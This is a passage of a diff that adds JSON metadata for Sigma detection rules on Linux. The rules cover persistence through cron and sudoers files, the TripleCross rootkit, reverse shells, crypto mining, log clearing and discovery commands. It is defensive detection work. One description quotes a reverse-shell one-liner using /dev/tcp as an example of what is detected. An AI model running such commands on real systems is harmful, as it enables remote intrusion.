"2021/10/15", + "falsepositive": [ + "Any legitimate cron file." + ], + "filename": "file_create_lnx_persistence_cron_files.yml", + "level": "medium", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files" + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "filename": "file_create_lnx_persistence_sudoers_files.yml", + "level": "medium", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files" + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", + "level": "high", + "logsource.category": 
"file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile" + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", + "level": "high", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ] + }, + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence" + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "filename": "modsec_mulitple_blocks.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ] + }, + "uuid": 
"a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks" + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "level": "critical", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags" + }, + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags" + }, + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": 
"net_connection_lnx_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux" + }, + { + "description": "Detects relevant ClamAV messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_clamav.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ] + }, + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_ssh_cve_2018_15473.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ] + }, + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/16", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "filename": "lnx_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux" + }, + { + "description": "Detects suspicious session with two users present", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_guacamole.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly" + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_named.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error" + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_ssh.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + 
] + }, + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error" + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_vsftp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages" + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_at_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ] + }, + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + 
"Legitimate activities" + ], + "filename": "proc_creation_lnx_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text" + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/26", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell" + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI" + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + "https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage" + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_cat_sudoers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers" + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": 
"2022/09/15", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute" + }, + { + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_clear_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "meta": { + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Log rotation." 
+ ], + "filename": "proc_creation_lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate usage of xclip tools." 
+ ], + "filename": "proc_creation_lnx_clipboard_collection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool" + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_crontab_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "proc_creation_lnx_crypto_mining.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags" + }, + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators" + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_curl_usage.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux" + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ] + }, + "uuid": 
"7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation" + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any user deleting files that way." 
+ ], + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite" + }, + { + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_doas_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux" + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_file_deletion.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion" + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_install_root_certificate.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate" + }, + { + "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux" + }, + { + "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_groups.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + 